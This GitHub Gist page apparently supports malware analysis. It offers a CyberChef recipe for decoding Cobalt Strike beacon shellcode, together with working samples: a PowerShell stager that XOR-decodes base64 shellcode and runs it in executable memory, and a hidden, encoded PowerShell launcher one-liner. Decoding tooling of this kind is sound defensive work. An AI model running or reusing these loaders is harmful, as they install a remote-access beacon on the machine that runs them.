Forked from 0xtornado/0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created
July 22, 2021 18:01
-
-
Save sopsmattw/8044c87e03b34a40426204e34544b92b to your computer and use it in GitHub Desktop.
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Set-StrictMode -Version 2 | |
| $DoIt = @' | |
| function func_get_proc_address { | |
| Param ($var_module, $var_procedure) | |
| $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) | |
| return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) | |
| } | |
| function func_get_delegate_type { | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, | |
| [Parameter(Position = 1)] [Type] $var_return_type = [Void] | |
| ) | |
| $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
| $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
| $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
| return $var_type_builder.CreateType() | |
| } | |
| [Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckt2hyMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMTRR1EkhGVWROcXZvdnJCG1loTUAUcU1OUWJ3SlFNYFQjvLTHW2pHWSH8aiBzI6YUm3dAYLUNnsdxRUJhSsiV7rV2fxUkSKHG4Qfm2my6I3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwt0Sk1HTFRQA213AxUNEhgDdGx0FRcYA3dRSkdGTVcMFA0TGANRVRkSEg0TCgNPSkhGA2RGQEhMLikjPpmncpaTwXXfZ/P4PxXiSMhg8Vu3fsdoQZEAmRULgWILIWjS5Je9oY2tRF/3CVK0iG/EGiE4pskDsNBcFnti+smmfGmSz6DP3ghXDgq2EIFw/45tPo/3s3t7ZgfV5tF7mOcRbALoMqRsxsGv7ecHfLNbv55Ts7Gz43mpw7AKhte18aEwaelJ8rBaPiMAN3J6DIOl2R0y5Uh9KrEGhX3rA5JCkpTg3eA74fjMd0WEFN2xfp5z0dP39jOMCyZraMTiAHCpV0HNzmVjKRoj8ipg20F/fitioP9EvUs8+CNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcU0JQV0ZBSk0OUFZASFAOTUxUDUFKWSMxF3Vb') | |
| for ($x = 0; $x -lt $var_code.Count; $x++) { | |
| $var_code[$x] = $var_code[$x] -bxor 35 | |
| } | |
| $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) | |
| $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40) | |
| [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length) | |
| $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void]))) | |
| $var_runme.Invoke([IntPtr]::Zero) | |
| '@ | |
| If ([IntPtr]::size -eq 8) { | |
| start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job | |
| } | |
| else { | |
| IEX $DoIt | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADMAUABhAE8AQgBQACsASABQADQASwBmAGMAaQBNADcAUwBsAFEARQBuAEoAcAA2AEUAMQBtAHkAbQAvAE0AQwA0AFQARwBKAEsASABsAEcARQBiAEkATQBqAEUAUgBGAGsAaQB5AHcAVgB6ADcAdgA3ADgAcgBHADMAUAAwAG0AcgB4AHYAWgArADQAeQB3ADAAUwBXAGQAbABlADcAegB6ADYANwBLADQAZQBxAGcAcQBPAEUAVAAxAFMAZgB1AHgAUQBWAEgAcQBtAFEAUABnAC8AUQBaAFMANQAzADMAdQBDADIAUQByAGYAbwBrADUASAB6AHcAbwBBAG8AdgBhADAAWABzAHcAVgBWAHMANwBYAGcAWgBJAFoAZABWADEAQQBwADAAWgArADUAcwB5AEUAVwBlAEkAWABNADgAdwBpAEwAMgBZAHEANwBJAGEATgA1AGwASAB4AG8AUQBlAHEARwBnAGwAcABuAFoANwBtAHoAWgBDAHMATQBKAFAAYgBvAEwATQBEAEsAagArAGgAcwBSAGQAVQB6AGQAeQBWAGMAWgBFADYAcQA2ADMAVwBEAHIANwBBAGYAVABEADkAKwByAEkAZABDADAARQBDAGwAMwA4AFUAMgBWAFYAVQBwADYAVwByAE8AZgBDAHAATgBDADMAMQBEAFQAOAA5AFUAMABNAEwAZABmAEUAbQBKAFEAbgArAGkAOAAxAG0AeAB6AGYAZwBjAHMANABOAFkAWABNAGYAawBHAFEASwBxAEIAcQA0ACsANgAzAEcAQwBkAFEAUgBGAFoAOAAxADgAWgBSAHAALwAvAEcARgBZAGsAOABMAEYAdABOAGoAYwBoAEoAaABKADAAMwBCAGkAcQBlAGkAcQA2AEQASgBtAFcATwBpADcAcABTADgAYwB4AFcAdABxAEcAbgAyAGYAQwBDADYANQBwADQAcABQAGYAbABDACsATABEADQAawAzAGcAOABTADUALwB1AHAANwA0AFoAMQBpAEcAeQB4AHgAaABEAEgAMgAwAEYAcQBxADYAbQBPAGEAYwBCAHkAQwBOAGgAVQBVAHcAeQBOAFAASgByAG8AKwB5AGIAVABLAGYAcAAwADkATwBZACsARABKAFMALwBvAGsAVQA3AFUARgBUAHcAdABVAE4ARgA1AEIATQBxAGkAeAAwAGMAdQBJAHoAZQBVAHcALwBVAEQAQQBuAHAAQwB4AGEARwBCAFUANABJAHEAawBJAFIAbwBNAHcAWAAwAEkAdgA0AEMAegBYAFAAZwA1AEMAeABQAE4AaQBkAC8ASwByAGQAcQBUAG0AZwAyAHcAegBjAFgAMQBVAHkAVAA1AFYAQQBhAHEAaQBFAGwAVAA5AHcANABsAGYAZwA2AEMAZQA4AFMAYwAxAEIATwBEADkANQBmADAASQB1AEMALwA1ACsASQBwAGkAVgArADUANQA3AGgAYQBvAHUAWgBYAFMAQgBGAFoAMABwAHcAUABlAEUAcQA3AG0AegBzADAAbQB5AHAAQgBDAFAATwBlAFQAUwBUAC8AUgB1AFUAUwBtAFAAKwB1AEEARQBWAGwAegBFAE8AcAAwAGoARQBWAEoAcgArAGwAZAArADAAbQBzAHoAVABaAGwALwAwADkAQgBGAHAAbgBYAFEAUwBkAE8AVAArAG4ARwBMAEoAbwAvAGMAZAA2AGUANQBNAHkAdAAzAFkASQAvAGUAbgA4ADEARABuADcAbABVADYAUABPADMAcQA2AEYAQgBQAFQAKwBnAGoAVABqAEEASwA1ADkAawBoAEQAZABmAHkAeABuADEARwBFADMAdwBLAEcAWgBpAEEALwBEAFQATgBBADQASAAxAEcAMABjADAARABFADAAbwBKAE8AZgAxAFoAbwByAFgAeAAxADEAYQA2AGwAegBWAFEASgA1AGwAKwBBAFYAVQBNAEwANgAwAFoAawAwAGgANgBaAGgAQgAzADIANgBBAHYAegBTAGIANgBEAHAAdQBRAGQAbABSAGoAUABwAFEAMgBuAEYAMgBlADMANgBXADMATwA1AHoAcgBDAFUAZQBUAFEATQBvAGMANQBKAEgAagBrAFUATQArAHIAbQBVAFQAVwBRAC8AdQBHAG8ARwBpAHEAZQBMAEkAMgAvADMATwAyAEgAVABQAGsARQBTADUAVwBaAG0AMQBxAHYAUQBIAHEANAB1AHMANABEAHEASgBpAFEAUQBIAFkAQgBoAHAARwB6AHAAcwBUAEgAVABLAE8AUwBSAHgAMwBmAHAAYgBYAFkAOABSAGUAWgBDADgAYQByAG0ATgBRAHgAWQAxAEIAeQBZAEMAbQBDAG4ATQBDAE8AeABzAEoAUgBtAGoAUABDAHoAZgArAGQASAAxAGIAUgBvAGMAcABlAHIAUgBsAGQAZwBYAFQAUwBoAFYAbwBNAEwANgBEAG4ASABDAG8AcQBvAFIAdABlAFUATgBmADQASAAyADUAbgBkAFoASQBXAGgAYwBZAHEAQQArAG4ARQBhAFMAQwBBAHcANwBqAEsAbwAwAGQAZgBLAE8AaAByAFIAdgA0AG4ANAB2ADAAegA5ADMANQBzAE0AVAArADQAVwBSAGYAMABrAEUAZwB6AEsAYwBSAEoATABWAGEANgBYAEIASgBKAG8AbwBmAEwANwBSAEgATABCAEQAbQBoAEEATABXAFcANABLAHMAYQBsAHYAVAA2AHkAawBuAGEAbQBHAG0AVQBiADgASwBOAEgAZgBlAFgAbgA2ADkARgB1AHgAbQAxAE8AcAB0AE8AYwB3AFMALwBDAEgANwBsAFQAYQB2AFoANgAzAFgAdgAxADcAWAA3AEgAbQBtAEcAZAA4AE4ATwBxAGUAdgBaAG4AMgA4AGEAVgArAEUAMgB0AE0ATgBSAHIAVgBSAHUAbABVAEIAdQB2ADIAawAzAFAAVAB1ADYANAAxADgAdQB3AHQAWABWAGgAYgB1ADIAbwB3AEgAcwB5AFEAKwBiAGoAbQB6AFkAVQBhAFAAYQB1AGQAegB3ADEAdgBYAEMAcgB4AHoAcwBwAFAAcQBmADUAOQB1AEwAKwBkAGgAdQBmAFoAaQAzAFcAMQBlAGQAUgA5AG4AUwA4AGgAMAA3AHEAcgBVADIAOQBRAHEASAA5AFgAcwA3AHEAdgBNAHUANgBOADEAYwByADQAUABhADEAcgAyAGkAegBlADQAMQBIAGYAZgBJAHQAcQB4AHUASwBGADcAcwA0AHYAOAA4AHYAbQB1AEcAZwArADYAWABrAGwAegAyAEkAUQBhAG4AcwBpAGYAZAArAHEAQgByAGwAOQBTAEgANQAzAEsAagBYAFIANQArADMAYwBkAGMATAB1ADEANAA4AEYAcwB6AFgATQBmAGsAUgBTADUAZgBZAHIASgAwADQAcgB0AFIATgB3AGEANQBsAHgAZgBtAE8ATABXAGQAYwAvAGwAMQA5AEgANwBvAGsAVQBwAHcAeAB3AGQAYgB0ADIAdQBYAFcANwAxADYAYQBVAGUAMwA3AHYANQB5AEgAUQA3AEcAbwA0AGUAWABwAGUATwBBAC8ATABWAG8AOABiAHUASABZAEMAUABiAGkAeQBzAG4ANQBPAE0AdABpAFcARAAvAHcAbgBIAGMAbgBRAHUAQgBSAGUAUAA0AFMAMwBtAEkAdQBiAHMAbAArADIAUQAvADcAagBmAGcANwB0AE0AegB3AEkAZQBVAE4AKwAyAGIARABzAFEAVgAxAE8ASwBlADIAUABnAEUATQBDAGUAZABmAHQAeAA3AGoAbwBkAE8AWQB0AE4AdABSAHMAdABMADcANABNAEgALwBwAGUAYwBkADAAOABYADYAMAA2AEgAVgBEAFkAZwBmAC8AMABjADEAVwBLAEoAcgB4AGgANQBjAFMAcAAzAFQANAB2AHgAbQBGAFQAVQByAGwAUABiAEQAMwB0AGsAcwBDAGYAbABUAHUAVgA5AFkAMQB3AFoATwBXAHoAUQA5AGkANQBxADQAOAAvAE0AZgBYAHIAbwBiAEIAKwBhAEQAOAAyAHgAdgBXACsATwAzAFUAZAA1AHEAMQBuAGwAYwBRAEYAegBZAHEAZAA3ADcAKwA4AEkALwBoAGUAWQBRAGsAZgBlAEEARgB1AEEAaQBIAHIALwAzAFQAdABMADkAKwAvAGoAeQBlAFIAOABOADgAMwBtADcAZgBHADcATQBOACsAQgB0AGYASgB2AG0AbwBQAEoAUwBZAFIAUABtAFAAZgBXAEUATwB0AGoASQBaADgAeABBADAAYgBDAEkATQByAGEAUwBJAHUATAAxAG0ARwBjAEQATABtAHYATgBVAHoAegA5AFIAZgBRAEMAeABVAEIAWgBmAEEANgBnAFAAZABEAFYAbgB4AFYAeABqAGoAUgBBAC8AQwBOAFMAUQBUAGoATwBCADIAUwBVADIAZwB5AEQANwBBAHMAWAA3ADYANgBzAHQAQgBSAEUASwBaAGUARwB0AE0AOAA5AEwAeABrAFMAQgB3AGkAegBHAFoAbABKAHYAagB4ADQAMQBjAEkATAAzADgAQwBZAG8AOABHAEMALwBXAGMAUgA2AFYAZAB1AFYAUQBxADYAZgA5AFgASgBTAHYAMwA2ADcARABVACsAVABvADIAagArAGIAeQBlAGsAaQBlAGUASABKADYARQAwAHQAdQBzAGcANwBvAGkAegBCAFkAMABYADgAeABBAFQAOQBjACsAdgArAGgAMQBlAEEAbABjAC8AWQBJAFgAZQBMAFEANgAzAGgAWgBPAGUATgBUAEwAbQBkADcANgBHAFIAZgArAG4AdAA0AFIAZABJAE4AdQBrAG0ANABKAHgAVQBXAHEAcgBEAGsAYwAzAGgAeQBKAGoAMwBVAFAATQBjAFcAcwBwAHQAagBkAEkANwBSAGQAMQBTAEEAOABLAHEAeQBmAEEAbgB2AFQAcgBFAEkAZABVAE4ARgA2AFQAUAA2AEcAOQBwAGkAUAAxAFgAOABoAHUANABwAG8AZgBBAE0ASwBuAFQANQBIAEYAaABLAFkAUwA1AHEAMAA0AGsAUgBMAFEAeAA3AC8AdwBYAEsAVABPAHAAdQBsAHcAcwBBAEEAQQA9AD0AIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA= |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment